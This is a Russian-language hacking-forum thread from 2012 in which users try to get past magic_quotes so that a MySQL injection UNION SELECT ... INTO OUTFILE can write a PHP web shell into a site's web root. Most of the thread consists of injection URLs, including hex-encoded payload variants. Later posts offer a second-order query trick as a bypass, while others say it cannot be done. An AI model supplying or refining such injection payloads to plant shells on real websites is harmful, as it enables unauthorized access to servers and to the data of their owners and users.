ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Как обойти magic_quotes в outfile mysql? (https://forum.antichat.xyz/showthread.php?t=325802)

MrHunter 27.03.2012 18:07
Всем привет. Столкнулся с такой проблемой. Хочу залить шелл, но на сайте включен magic_quotes. То есть выполнить такой запрос я не могу

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707

,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/

cyphor/shell.php'

Кто знает как решить проблему?

Expl0ited 27.03.2012 18:08
Никак.

OxoTnik 27.03.2012 18:11
твой запрос

Цитата:
Сообщение от None
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
в него встраиваем внутренний запрос

Цитата:
Сообщение от None
-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
только в хексе

Цитата:
Сообщение от None
0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870
и должно быть что то вроде

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--

Вроде так можно

Expl0ited 27.03.2012 18:25
Аннет, всётаки так нельзя, вложенный запрос не обработается, т.к. это не предусмотрено исполняемым скриптом, если опираться на первый пост.

OxoTnik 27.03.2012 18:34
Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?

MrHunter 27.03.2012 18:42
Цитата:
Сообщение от OxoTnik
твой запрос
в него встраиваем внутренний запрос
только в хексе
и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--
Вроде так можно
OxoTnik,не выходит. Когда делаю внутренний запрос (в хекс), то он воспринимается как строка, а не как запрос. Искал возможность через сохраненные процедуры, но тоже решения пока не нашел. Есть ли другие предложения?

Ereee 28.03.2012 21:50
Цитата:
Сообщение от OxoTnik
Expl0ited
это из-за хекса нельзя, который у него в первом посте? или изза "null"?
Путь юзать в хексе нельзя.

TC, ответ дали же. НИКАК.

Pirotexnik 13.04.2012 11:05
Можно обойти, при условие, что запрос передается через переменную в другой запрос.

Точда кодируем в хекс и во втором запросе кавычки выполнятся нормально


Время: 04:37